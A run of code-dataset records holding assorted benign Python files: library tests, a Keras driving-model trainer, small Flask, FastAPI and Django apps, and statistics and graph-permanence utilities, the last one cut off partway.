nontrivial.\n self.target = self.leaf.with_rows_satisfying(\n ColumnExpression.reference(self.a).gt(ColumnExpression.literal(0))\n )\n\n def test_attributes(self) -> None:\n \"\"\"Check that all UnaryOperation and Relation attributes have the\n expected values.\n \"\"\"\n relation = self.target.materialized(name_prefix=\"prefix\")\n assert isinstance(relation, Materialization)\n self.assertEqual(relation.columns, {self.a})\n self.assertEqual(relation.engine, self.engine)\n self.assertEqual(relation.min_rows, self.target.min_rows)\n self.assertEqual(relation.max_rows, self.target.max_rows)\n self.assertTrue(relation.is_locked)\n self.assertTrue(relation.name.startswith(\"prefix\"))\n\n def test_apply_simplify(self) -> None:\n \"\"\"Test that applying a Materialization to a leaf or an existing\n materialization does nothing.\n \"\"\"\n self.assertEqual(self.leaf.materialized(), self.leaf)\n self.assertEqual(self.target.materialized(name=\"a\").materialized(\"b\"), self.target.materialized(\"a\"))\n\n def test_iteration(self) -> None:\n \"\"\"Test Materialization execution in the iteration engine.\"\"\"\n relation = self.target.materialized(name=\"m\")\n self.assertEqual(\n list(self.engine.execute(relation)),\n [{self.a: 1}],\n )\n self.assertIsNotNone(relation.payload)\n self.assertIsInstance(relation.payload, iteration.MaterializedRowIterable)\n\n def test_str(self) -> None:\n \"\"\"Test str(Materialization) and\n str(UnaryOperationRelation[Materialization]).\n \"\"\"\n relation = self.target.materialized(name=\"m\")\n self.assertEqual(str(relation), f\"materialize['m']({self.target})\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"lsst/daf_relation","sub_path":"tests/test_materialization.py","file_name":"test_materialization.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43799032563","text":"# 2002 추월\n# 31256 KB / 72 ms\n\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nin_ = {}\nout_ = []\nfor i in range(n):\n in_[input().rstrip()] = i\nfor _ in range(n):\n out_.append(input().rstrip())\n\ncnt = 0\nfor i in range(n-1):\n for j in range(i+1, n):\n if in_[out_[i]] > in_[out_[j]]:\n cnt += 1\n break\nprint(cnt)","repo_name":"KDT-02-Algorithm-Study/Algorithm-Study","sub_path":"week17_230504/2002_추월/2002_정광배.py","file_name":"2002_정광배.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"72138277201","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport os, cv2, time, pickle, fnmatch,math, shutil\nimport numpy as np\nimport tensorflow as tf\nimport pandas as pd\nimport sklearn\nfrom sklearn.model_selection import train_test_split\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom keras.utils import np_utils\nfrom keras.layers import Lambda, Conv2D, MaxPooling2D, Dropout, Dense, Flatten, Input, Activation, Concatenate\nimport keras.backend.tensorflow_backend as ktf\nfrom keras.optimizers import SGD, Adam\nfrom keras.models import Sequential\nfrom keras.models import Model\nfrom keras import backend as K\nfrom keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, LambdaCallback, Callback\n\n## 環境變數設置\n# 指定要使用哪一片GPU\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\nos.environ['HDF5_USE_FILE_LOCKING']='FALSE'\n\n# 自動增長 GPU 記憶體用量\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth=True\nconfig = tf.ConfigProto(allow_soft_placement=True)\nsession = tf.Session(config=config)\nktf.set_session(session)\ngraph = False \n\n## 路徑初始化\nloaded_csv_path = '../../data/csv/straight_store.csv' # 訓練列表的路徑\nmodel_save_path = '../../data/model/straight/' # 訓練完模型的存放路徑\ndataset = [] # 存處理過後的訓練資料\n\n\n##參數初始化\n# 要訓練的圖片大小以及channel(rgb, gray...)\nimage_width = 400 \nimage_height = 400 \nimage_channel = 1\n\n# 驗證資料佔所有資料的百分比\nvalidation_size = 0.2\n# 幾個epoch存一次model\nsave_model_in_number_of_epoch = 30\n# steps_per_epoch* batch_size = number of images in training/validation set\nSteps_per_epoch = 200\ntraining_batch_size = 64\nvalidation_batch_size = 4\n# 訓練次數\ntraining_cycle = 40\n\n\n\n# 因為csv中的資料尚未平衡過(通常直行的資料量 >>> 轉彎)\n# 需要平衡資料, 將兩類資料平衡, 達到更好的訓練效果\n\ndef data_balance_and_augmention():\n global dataset\n #從csv讀取各行資料\n dir_log = pd.read_csv(loaded_csv_path,usecols=[1,3]) # 左方向, 右方向\n speed_log = pd.read_csv(loaded_csv_path,usecols=[2,4]) # 左輪速, 右輪速\n filename_list= pd.read_csv(loaded_csv_path,usecols=[5]) # 檔案名稱\n\n # 將資料格式轉為list\n dir_log = np.array(dir_log).tolist()\n speed_log = np.array(speed_log).tolist()\n filename_list = np.array(filename_list).tolist()\n\n # 將轉彎與直行的資料分開存\n turn_dir_list = [] \n turn_speed_list = []\n turn_list_img = []\n straight_dir_list = []\n straight_speed_list = []\n straight_list_img = []\n\n # 遍歷所有資料\n for i in range(len(dir_log)):\n if dir_log[i][0] == 0: #左輪方向為0, 表示轉彎\n turn_dir_list.append(dir_log[i])\n turn_speed_list.append(speed_log[i])\n turn_list_img.append(filename_list[i])\n else:\n straight_dir_list.append(dir_log[i])\n straight_speed_list.append(speed_log[i])\n straight_list_img.append(filename_list[i])\n\n # 進行資料擴增\n turn_dir_list_ = []\n turn_speed_list_= []\n turn_list_img_=[]\n # 如果轉彎的資料量 < 直行的資料,就將轉彎資料擴增一倍\n while(len(turn_dir_list_) < len(straight_dir_list)):\n turn_dir_list_.extend(turn_dir_list)\n turn_speed_list_.extend(turn_speed_list)\n turn_list_img_.extend(turn_list_img)\n\n\n # 再將轉彎資料與直行資料接起來\n dir_log = []\n speed_log = []\n filename_list = []\n\n dir_log.extend(turn_dir_list_)\n dir_log.extend(straight_dir_list)\n speed_log.extend(turn_speed_list_)\n speed_log.extend(straight_speed_list)\n filename_list.extend(turn_list_img_)\n filename_list.extend(straight_list_img)\n\n # 將圖片資料一筆一筆接起來\n for i in range(len(dir_log)):\n data_frame = [] \n data_frame.extend(speed_log[i])\n data_frame.extend(dir_log[i])\n data_frame.extend(filename_list[i])\n dataset.append(data_frame)\n\n\n dataset=pd.DataFrame(dataset)\n dataset.rename(columns={0:'left_wheel_speed',1:'right_wheel_speed',2:'left_wheel_dir',3:'right_wheel_dir',4:'filename'},inplace=True)\n\n return\n\n\n\n# 隨機平移照片, 創造資料多樣性\ndef random_shift_image(image):\n # 使照片偏移量界在-80 至 80 間 (np.random.rand()介於0 ~ 1之間)\n delta_x = int(160 * (np.random.rand()-0.5))\n\n # 將照片沿著x軸 shift x pixel\n shift_image = np.roll(image, delta_x, axis=1)\n\n # 向右shift後, 將左邊的空白補黑\n if delta_x>0:\n shift_image[:, :delta_x] = 0\n # 向左shift, 將右邊的空白補黑\n elif delta_x<0:\n shift_image[:, delta_x:] = 0\n \n # 左輪速應與右輪速相差 0 ~ 10, 可產生正常偏移結果\n delta_left_speed = int(delta_x / 8) \n\n return (shift_image, delta_left_speed)\n\n# 進行資料多樣化\ndef vary_image(img_path, left_speed, left_dir, right_speed, right_dir):\n\n # 將image 處理成 (400, 400, channel_size) 的array\n if(image_channel == 1):\n img = cv2.imread(img_path, 0)\n elif(INPUT_SHAPE[2] == 3):\n img = cv2.imread(img_path) \n \n img = cv2.resize(img, (image_width,image_height), fx=0, fy=0)\n img = img.reshape(image_width, image_height, image_channel)\n\n # 將資料進行隨機平移\n shift_image, shift_speed = random_shift_image(img)\n \n # 當畫面非為黑畫面的時候, 才進行shift\n if left_speed > 0:\n left_speed = left_speed + shift_speed\n #如果 shift 後的速度值 < 0, 就當作 0 \n if left_speed < 0:\n left_speed = 0\n # 保有右輪速度, 只改變左輪速度, 就可以產生左右輪的差, 進行修正\n return shift_image, left_speed, left_dir, right_speed, right_dir\n\n\ndef generator(samples, batch_size, mode='default'):\n num_samples = len(samples)\n while 1: \n # 產生 1 個 batch 的資料\n sklearn.utils.shuffle(samples) # 打亂資料, 創造batch多樣性\n for offset in range(0, num_samples, batch_size):\n # 一次讀取 batch size筆資料\n batch_samples = samples[offset : offset + batch_size]\n\n images = []\n left_speeds = []\n left_dirs = []\n right_speeds = []\n right_dirs = []\n\n for image, left_speed, left_dir, right_speed, right_dir in zip(batch_samples['filename'], batch_samples['left_wheel_speed'], batch_samples['left_wheel_dir'], batch_samples['right_wheel_speed'], batch_samples['right_wheel_dir']): \n #增加資料多樣性\n varied_image, varied_left_speed, varied_left_dir, varied_right_speed, varied_right_dir = vary_image(image, left_speed, left_dir, right_speed, right_dir)\n # 將各類資料分開存, 以便後續處理 \n images.append(varied_image)\n left_speeds.append(varied_left_speed)\n left_dirs.append(varied_left_dir)\n right_speeds.append(varied_right_speed)\n right_dirs.append(varied_right_dir)\n\n # 將各類資料都轉成 array 格式, 才可以進行training\n X_train = np.array(images)\n y_train = np.array([left_speeds, left_dirs, right_speeds, right_dirs])\n left_speeds = np.array(left_speeds)\n left_dirs = np.array(left_dirs)\n right_speeds = np.array(right_speeds)\n right_dirs = np.array(right_dirs)\n \n # 回傳值, 但不會終止function\n yield X_train, [left_speeds, left_dirs, right_speeds, right_dirs]\n\n\ndef save_model(model_name):\n t = time.localtime()\n timestamp = time.strftime('%b-%d-%Y_%H-%M-%S', t)\n model_name = (model_path + model_name + '_' + timestamp + '.h5')\n \n return model_name\n\n\ndef define_training_network():\n # activation function\n losses = {\n \"right_dir_output\": \"binary_crossentropy\",\n \"left_dir_output\": \"binary_crossentropy\",\n \"left_speed_output\": \"mse\",\n \"right_speed_output\": \"mse\",\n }\n \n DROP_PROB = 0.7 #隨機丟掉神經元,可以避免overfitting\n\n main_input = Input(shape=(image_width, image_height,image_channel), name='main_input')\n ### convolution layer\n x = Conv2D(24, (3, 3), activation='relu', strides=(2, 2))(main_input)\n x = Conv2D(24, (3, 3), activation='relu', strides=(2, 2))(x)\n x = Conv2D(36, (5, 5), activation='relu', strides=(2, 2))(x)\n x = Conv2D(48, (5, 5), activation='relu', strides=(2, 2))(x)\n x = Conv2D(64, (3, 3), activation='relu')(x)\n x = Conv2D(64, (3, 3), activation='relu')(x)\n x = Conv2D(64, (3, 3), activation='relu')(x)\n ###\n\n x = Dropout(DROP_PROB)(x)\n x = Flatten()(x)\n\n ### fully connceted layer\n x = Dense(512)(x)\n x = Dense(128)(x)\n x = Dense(10)(x)\n ###\n\n left_speed_output = Dense(1, name='left_speed_output')(x)\n\n left_dir_input_from_speed = Dense(5, name='left_dir_input_from_speed')(left_speed_output)\n left_concat_layer= Concatenate()([left_dir_input_from_speed, x])\n left_dir_output = Dense(1, name='left_dir_output', activation='sigmoid')(left_concat_layer)\n\n right_speed_output = Dense(1, name='right_speed_output')(x)\n\n right_dir_input_from_speed = Dense(5,name='right_dir_input_from_speed')(right_speed_output)\n right_concat_layer= Concatenate()([right_dir_input_from_speed, x])\n right_dir_output = Dense(1,name='right_dir_output', activation='sigmoid')(right_concat_layer)\n \n model = Model(inputs=[main_input], outputs=[left_speed_output, left_dir_output, right_speed_output, right_dir_output])\n model.summary()\n model.compile(optimizer=\"adam\", loss=losses)\n # model summary \n\n return model\n\n\ndef train(model):\n # 將資料分成測試資料及驗證資料\n train_samples, validation_samples = train_test_split(dataset, test_size= validation_size)\n\n for cycle in range(training_cycle):\n #產生圖片batch\n train_batch_generator = generator(train_samples, training_batch_size)\n validation_batch_generator = generator(validation_samples, validation_batch_size)\n\n #訓練神經網路\n history_object = model.fit_generator(\n train_batch_generator, \n steps_per_epoch=Steps_per_epoch, \n validation_data=validation_batch_generator, \n validation_steps=len(validation_samples)/2, \n epochs=save_model_in_number_of_epoch, \n verbose=1)\n\n # 儲存 model\n h5_output = save_model(str(history_object.history['loss'][save_model_in_number_of_epoch-1]) + str(cycle)) \n model.save(h5_output)\n print(\"Model saved\")\n\n print('Cycle: ',cycle+1)\n\n\n\ndef main():\n data_balance_and_augmention()\n model = define_training_network()\n train(model)\n\nif __name__ == '__main__':\n main()\n","repo_name":"JoyingKuo/AI_AGV","sub_path":"train/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6419336034","text":"import logging, argparse, json, os\nfrom flask import Flask, request, jsonify\nfrom classificator_taxtags import search, init\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef rules_apply():\n quest_json = request.get_json()\n # print(quest_json)\n data_rout = r\"./data/tax_dems_jsons\"\n with open(os.path.join(data_rout, str(quest_json['docid'])+\".json\"), 'w', encoding='utf8') as f:\n json.dump(quest_json, f)\n res = search(quest_json['docid'], quest_json['text'])\n return jsonify(res)\n\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\n\nif __name__ == '__main__':\n init()\n # global data_rout\n # data_rout = r\"./data/tax_dems_jsons\"\n\n args = argparse.ArgumentParser()\n args.add_argument('--host', dest='host', default='0.0.0.0')\n args.add_argument('--port', dest='port', default='4888')\n args = args.parse_args()\n app.run(host=args.host, port=args.port)\n","repo_name":"nichnikov/tax_tags_stend","sub_path":"server_classificator.py","file_name":"server_classificator.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42728756812","text":"import mcschematic\r\n\r\n\r\ndef single_gateway(relx, rely, relz, xout, yout, zout, schem):\r\n # set up the nbt tag\r\n nbt_tag = \"minecraft:end_gateway{Age:180,ExactTeleport:1,ExitPortal:\" \\\r\n \"{X:\" + str(xout) + \",Y:\" + str(yout) + \",Z:\" + str(zout) + \"}}\"\r\n print(nbt_tag)\r\n # place the blocks\r\n schem.setBlock((relx, rely, relz), nbt_tag)\r\n return schem\r\n","repo_name":"Patcybermind/64-bit-gateway-bus-generator-for-orenet","sub_path":"64 bit bus gen/single_gateway_function.py","file_name":"single_gateway_function.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25335485976","text":"#!/usr/bin/env python\n\nimport os\nbase_path = os.path.abspath(os.path.dirname(__file__))\n\n\ndef configuration(parent_package='', top_path=None):\n from numpy.distutils.misc_util import Configuration, get_numpy_include_dirs\n from skimage._build import cython\n\n config = Configuration('resample', parent_package, top_path)\n config.add_data_dir('tests')\n\n cython(['_resample.pyx'], working_path=base_path)\n\n config.add_extension(\n '_resample',\n sources=['_resample.c'],\n include_dirs=[get_numpy_include_dirs()],\n extra_compile_args=[\n \"-fopenmp\",\n \"-pthread\",\n \"-O6\",\n \"-march=native\",\n \"-mtune=native\",\n \"-funroll-all-loops\",\n \"-fomit-frame-pointer\",\n \"-march=native\",\n \"-mtune=native\",\n \"-msse4\",\n \"-ftree-vectorize\",\n \"-ftree-vectorizer-verbose=5\",\n ],\n extra_link_args=['-fopenmp'],\n )\n\n return config\n\n\nif __name__ == '__main__':\n from numpy.distutils.core import setup\n setup(configuration=configuration)\n","repo_name":"nsf-ri-ubicv/sthor","sub_path":"sthor/operation/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"18519076921","text":"from math import sqrt\r\n\r\nclass Statistics:\r\n @classmethod\r\n def mean(cls, dataset):\r\n l = len(dataset)\r\n\r\n if isinstance(dataset[0], list):\r\n return [sum(dim) / l for dim in zip(*dataset)]\r\n\r\n return (sum(dataset) / l)\r\n\r\n @classmethod\r\n def variance(cls, dataset, mean_data=None):\r\n if mean_data is None:\r\n mean_data = cls.mean(dataset)\r\n\r\n l = len(dataset)\r\n if isinstance(dataset[0], list):\r\n return [sum([(i-m) ** 2 for i in xi])/l for xi, m in zip(zip(*dataset), mean_data)]\r\n\r\n return sum((xi - mean_data) ** 2 for xi in dataset) / l\r\n\r\n @classmethod\r\n def covariance(cls, dataset_u, dataset_v, mean_u=None, mean_v=None):\r\n if mean_u is None:\r\n mean_u = cls.mean(dataset_u)\r\n if mean_v is None:\r\n mean_v = cls.mean(dataset_v)\r\n\r\n return sum((xi - mean_u) * (yi - mean_v) for xi, yi in zip(dataset_u, dataset_v)) / len(dataset_v)\r\n\r\n @classmethod\r\n def std_dev(cls, dataset, mean_data=None):\r\n if isinstance(dataset[0], list):\r\n return [sqrt(var) for var in cls.variance(dataset, mean_data)]\r\n\r\n return sqrt(cls.variance(dataset, mean_data))\r\n\r\n\r\n\r\nclass Evaluation:\r\n @classmethod\r\n def _01_accuracy(cls, predictions, true_labels):\r\n return sum(1.0 if yi == ri else 0.0 for yi, ri in zip(predictions, true_labels)) / len(predictions)\r\n\r\n @classmethod\r\n def get_accuracy(cls, predictions, true_labels, scoring = \"0-1\"):\r\n if isinstance(scoring, str):\r\n if scoring == \"0-1\":\r\n scoring = cls._01_accuracy\r\n\r\n return scoring(predictions, true_labels)\r\n\r\n\r\nclass LinAlg:\r\n @classmethod\r\n def distance(cls, u, v):\r\n if isinstance(u, float):\r\n return abs(u - v)\r\n return sqrt(sum((ui - vi) ** 2 for ui, vi in zip(u, v)))\r\n\r\n","repo_name":"poooh/MLProject2018","sub_path":"ml_project/ml_project/lib/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32456219781","text":"from fastapi import FastAPI, HTTPException\nfrom typing import List, Optional \nfrom models import User, Gender, Role, UserUpdateRequest\nfrom uuid import UUID, uuid4\nfrom pydantic import BaseModel\n\n\n\napp = FastAPI()\n#Here we are adding the DB part that will be showed in localhost:8000/api/v1/users\ndb: List[User] = [\n User(\n id=UUID(\"bc9a22e2-bbc0-4203-a559-65e2579985c3\"), \n first_name=\"Juanita\", \n middle_name=\"H\",\n last_name=\"Perez\",\n gender=Gender.female,\n roles=[Role.student]\n ),\n \n User(\n id=UUID(\"539671f2-6b98-47ca-9a54-9f0e47e073f1\"), \n first_name=\"Rodolfo\", \n middle_name=\"J\",\n last_name=\"Vargas\",\n gender=Gender.male,\n roles=[Role.admin, Role.user]\n )\n]\n\n@app.get(\"/\")\nasync def root():\n return {\"Hello\": \"Mundo\"}\n\n@app.get(\"/api/v1/users\")\nasync def fetch_users():\n return db;\n\n#With this we can register new users\n@app.post(\"/api/v1/users\")\nasync def register_user(user: User):\n db.append(user)\n return {\"id\": user.id}\n\n#With this one, we can delete a user\n@app.delete(\"/api/v1/users/{user_id}\")\nasync def delete_user(user_id: UUID):\n for user in db:\n if user.id == user_id:\n db.remove(user)\n return \n raise HTTPException(\n status_code=404,\n detail=f\"user with id: {user_id} does not exists\"\n )\n\n@app.put(\"/api/v1/users/{user_id}\", response_model=User)\nasync def update_user(user_id: UUID, user_update: UserUpdateRequest):\n for user in db:\n if user.id == user_id:\n if user_update.first_name is not None:\n user.first_name = user_update.first_name\n if user_update.last_name is not None:\n user.last_name = user_update.last_name\n if user_update.middle_name is not None:\n user.middle_name = user_update.middle_name\n if user_update.roles is not None:\n user.roles = user_update.roles\n return user\n # Return a 404 response if the user with the specified ID is not found\n raise HTTPException(\n status_code=404,\n detail=f\"User with id {user_id} not found\",\n )","repo_name":"RodoVR2403/fastAPI_project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6119032414","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseNotFound, HttpResponseRedirect\nfrom django.urls import reverse\n\nzodiac_dict = {\n 'aries': 'Овен - первый знак зодиака, планета Марс (с 21 марта по 20 апреля).',\n 'taurus': 'Телец - второй знак зодиака, планета Венера (с 21 апреля по 21 мая).',\n 'gemini': 'Близнецы - третий знак зодиака, планета Меркурий (с 22 мая по 21 июня).',\n 'cancer': 'Рак - четвёртый знак зодиака, Луна (с 22 июня по 22 июля).',\n 'leo': ' Лев - пятый знак зодиака, солнце (с 23 июля по 21 августа).',\n 'virgo': 'Дева - шестой знак зодиака, планета Меркурий (с 22 августа по 23 сентября).',\n 'libra': 'Весы - седьмой знак зодиака, планета Венера (с 24 сентября по 23 октября).',\n 'scorpio': 'Скорпион - восьмой знак зодиака, планета Марс (с 24 октября по 22 ноября).',\n 'sagittarius': 'Стрелец - девятый знак зодиака, планета Юпитер (с 23 ноября по 22 декабря).',\n 'capricorn': 'Козерог - десятый знак зодиака, планета Сатурн (с 23 декабря по 20 января).',\n 'aquarius': 'Водолей - одиннадцатый знак зодиака, планеты Уран и Сатурн (с 21 января по 19 февраля).',\n 'pisces': 'Рыбы - двенадцатый знак зодиака, планеты Юпитер (с 20 февраля по 20 марта).',\n}\n\ntypes = {\n 'fire': ['aries', 'leo', 'sagittarius'],\n 'earth': ['taurus', 'virgo', 'capricorn'],\n 'air': ['gemini', 'libra', 'aquarius'],\n 'water': ['cancer', 'scorpio', 'pisces']\n}\n\nduration_zodiacs = {\n (1, 19): \"capricorn\",\n (20, 49): \"aquarius\",\n (50, 79): \"pisces\",\n (80, 109): \"aries\",\n (110, 139): \"taurus\",\n (140, 169): \"gemini\",\n (170, 199): \"cancer\",\n (200, 229): \"leo\",\n (230, 259): \"virgo\",\n (260, 289): \"libra\",\n (290, 319): \"scorpio\",\n (320, 349): \"sagittarius\",\n (350, 365): \"capricorn\"\n}\n\n\ndef get_yyyy_converters(request, sign_zodiac):\n print(f'тип - {type(sign_zodiac)}')\n return HttpResponse(f'вы передали число из 4-х цифр - {sign_zodiac}')\n\n\ndef get_my_float_converters(request, sign_zodiac):\n print(f'тип - {type(sign_zodiac)}')\n return HttpResponse(f'вы передали вещественное число - {sign_zodiac}')\n\n\ndef get_my_date_converters(request, sign_zodiac):\n print(f'тип - {type(sign_zodiac)}')\n return HttpResponse(f'вы передали дату - {sign_zodiac}')\n\n\ndef index(request):\n zodiacs = list(zodiac_dict)\n # f\"
  • {sign.title()}
  • \"\n context = {\n 'zodiacs': zodiacs\n }\n\n return render(request, 'horoscope/index.html', context=context)\n\n\ndef choose_element(request):\n elements = list(types)\n li_elements = ''\n for element in elements:\n redirect_path = reverse(\"horoscope_group\", args=[element])\n li_elements += f\"
  • {element.title()}
  • \"\n response = f\"\"\"\n
      \n {li_elements}\n
    \n \"\"\"\n return HttpResponse(response)\n\n\ndef get_info_about_element(request, type_element):\n zodiacs_of_element = types[type_element]\n li_element = ''\n for sign in zodiacs_of_element:\n redirect_path = reverse(\"horoscope_name\", args=[sign])\n li_element += f\"
  • {sign.title()}
  • \"\n response = f\"\"\"\n
      \n {li_element}\n
    \n \"\"\"\n return HttpResponse(response)\n\n\ndef get_info_about_sign_zodiac(request, sign_zodiac: str):\n description = zodiac_dict.get(sign_zodiac)\n data = {\n \"description_zodiac\": description,\n \"sign\": sign_zodiac,\n \"zodiacs\": zodiac_dict,\n\n }\n return render(request, 'horoscope/info_zodiac.html', context=data)\n\n\ndef get_info_about_sign_zodiac_by_number(request, sign_zodiac: int):\n zodiacs = list(zodiac_dict)\n if sign_zodiac > len(zodiacs):\n return HttpResponseNotFound(f\"неизвестный номер зодиака - {sign_zodiac}\")\n name = zodiacs[sign_zodiac - 1]\n redirect_url = reverse(\"horoscope_name\", args=[name])\n return HttpResponseRedirect(redirect_url)\n\n\ndef get_info_by_day(request, month, day):\n day_of_years = (month - 1) * 30 + day\n for key, value in duration_zodiacs.items():\n if day_of_years >= key[0] and day_of_years <= key[1]:\n redirect_url = reverse(\"horoscope_name\", args=[value])\n return HttpResponseRedirect(redirect_url)\n\n return HttpResponseNotFound(f\"

    месяц - {month}, день - {day}

    \")\n","repo_name":"PetruninKV/horoscope_page","sub_path":"horoscope/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5143,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38543087294","text":"#!/usr/bin/env python3\n\"\"\"Check if an appropriate Python environment is activated.\"\"\"\n\n# Future imports\nfrom __future__ import (\n annotations,\n)\n\n# Standard library imports\nimport sys\nfrom typing import (\n NoReturn,\n)\n\nEXIT_BADENV = 3\n\n\ndef handle_error(error: BaseException, message: str = \"\") -> NoReturn:\n \"\"\"Handle the import error produced by a block.\"\"\"\n error_message = f\"{type(error).__name__}: {error}\"\n messages = [\n \"\",\n \"*\" * 70,\n \"ERROR: Suitible Python environment not activated\",\n message,\n \"\",\n error_message,\n \"*\" * 70,\n \"\",\n ]\n print(\"\\n\".join(messages), file=sys.stderr)\n sys.exit(EXIT_BADENV)\n\n\ndef main() -> None:\n \"\"\"Try importing key deps and fail with a friendly error message.\"\"\"\n # pylint: disable = import-outside-toplevel\n # pylint: disable = too-many-try-statements\n # pylint: disable = unused-import\n try:\n # Third party imports\n import praw # noqa: F401\n import pydantic # noqa: F401\n except ImportError as error:\n handle_error(error=error, message=\"Runtime dependencies not found\")\n\n try:\n # Third party imports\n import mypy # noqa: F401\n import pyanalyze # type: ignore[import] # noqa: F401\n import pylint # type: ignore[import] # noqa: F401\n except ImportError as error:\n handle_error(error=error, message=\"Linting dependencies not found\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"r-spacex/submanager","sub_path":"tools/check_env_activated.py","file_name":"check_env_activated.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"9466659405","text":"def sayiSeslendirme(sayi):\n sayi = int(sayi)\n birlerBasamagı = sayi % 10\n onlarBasamagı = sayi // 10\n onlar = [\"\",\"On\",\"Yirmi\",\"Otuz\",\"Kırk\",\"Elli\",\"Altmış\",\"Yetmiş\",\"Seksen\",\"Doksan\"]\n birler = [\"\", \"Bir\" ,\"İki\" ,\"Üç\" ,\"Dört\" ,\"Beş\" ,\"Altı\" ,\"Yedi\" ,\"Sekiz\" ,\"Dokuz\"]\n return onlar[onlarBasamagı] + birler[birlerBasamagı]\n\nsayi = input(\"Bir sayı giriniz : \")\nprint(\"Sayının Okunuşu : \", sayiSeslendirme(sayi))\n","repo_name":"kilicmustafa/Python","sub_path":"Python Temel/Array ve demet işlemleri/sayıOkusu.py","file_name":"sayıOkusu.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"tr","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"20814833281","text":"from typing import List\nimport networkx as nx\nimport numpy as np\n\n\nclass PermanenceCalculator:\n \"\"\"Class to compute permanence of a node in a graph with respect to a\n community and a community structure.\n \n Returns a value between -1 and 1, where -1 is the worst permanence and 1\n is the best permanence. But for the community deception problem, we want\n to minimize the permanence, so the best permanence is -1.\n \"\"\"\n def __init__(self, graph: nx.Graph, community_target: List[int], community_structure: List[List[int]]):\n self.graph = graph\n self.community_target = community_target\n self.community_structure = community_structure\n\n def internal_pull(self, v: int)->int:\n \"\"\"\n Compute the internal pull of a node v in a graph G with respect to a \n community C, denoted by the internal connections of a node $v$ within \n its own community;\n\n Parameters\n ----------\n v : int\n Target node\n\n Returns\n -------\n internal_edges : int\n Internal pull of node v\n \"\"\"\n internal_edges = 0\n for node in nx.neighbors(self.graph, v):\n if node in self.community_target:\n internal_edges += 1\n return internal_edges\n\n def max_external_pull(self, v: int)->int:\n \"\"\"\n Compute the maximum connections to a single external community.\n\n Parameters\n ----------\n v : int\n Target node\n\n Returns\n -------\n max_external_edges : int\n Maximum external pull of node v\n \"\"\"\n max_external_edges = 0\n for community in self.community_structure:\n if v in community:\n continue\n external_edges = 0\n for node in nx.neighbors(self.graph, v):\n if node in community:\n external_edges += 1\n max_external_edges = max(max_external_edges, external_edges)\n return max_external_edges\n\n def internal_clustering_coefficient(self, v: int)->float:\n \"\"\"\n Compute the internal clustering coefficient of a node v in a graph G\n denoted by the fraction of actual and possible number of edges among \n the internal neighbors of v.\n\n Parameters\n ----------\n v : int\n Target node\n\n Returns\n -------\n float\n Internal clustering coefficient of node v\n \"\"\"\n # Get subgraph of the community\n community_subgraph = self.graph.subgraph(self.community_target)\n \n # Delete node v from the subgraph\n subgraph_copy = community_subgraph.copy()\n subgraph_copy.remove_node(v)\n \n # Compute the number of actual edges, excluding the edges of node v\n n_actual_edges = subgraph_copy.number_of_edges()\n \n # Compute the number of possible edges, excluding the edges of node v\n n_nodes = subgraph_copy.number_of_nodes()\n num_possible_edges = (n_nodes * (n_nodes - 1)) / 2\n del subgraph_copy\n del community_subgraph\n return n_actual_edges / num_possible_edges\n\n\n def permanence(self, v: int)->float:\n \"\"\"\n Permanence of a node v in a graph G with respect to a community C and\n a community structure, denoted by the fraction of the\n internal pull of v and the maximum external pull of v, minus the\n internal clustering coefficient of v.\n\n Parameters\n ----------\n v : iny\n Node to compute permanence\n\n Returns\n -------\n permanence_v : float\n Permanence of node v\n \"\"\"\n I_v = self.internal_pull(v)\n E_max_v = self.max_external_pull(v)\n deg_v = len(list(self.graph.neighbors(v)))\n C_in_v = self.internal_clustering_coefficient(v)\n assert E_max_v > 0, \"E_max_v must be greater than 0\"\n assert deg_v > 0, \"deg_v must be greater than 0\"\n permanence_v = (I_v / E_max_v) * (1 / deg_v) - (1 - C_in_v)\n return permanence_v\n \n def normalized_permanence(self, v:int)->float:\n \"\"\"\n Normalized permanence of a node v in a graph G with respect to a \n community C and a community structure, denoted by the fraction of the\n internal pull of v and the maximum external pull of v, minus the\n internal clustering coefficient of v.\n\n Parameters\n ----------\n v : int\n Node to compute permanence\n\n Returns\n -------\n permanence_v : float\n Permanence of node v\n \"\"\"\n # Get permanence, return a value between -1 and 1\n permanence_v = self.permanence(v)\n # 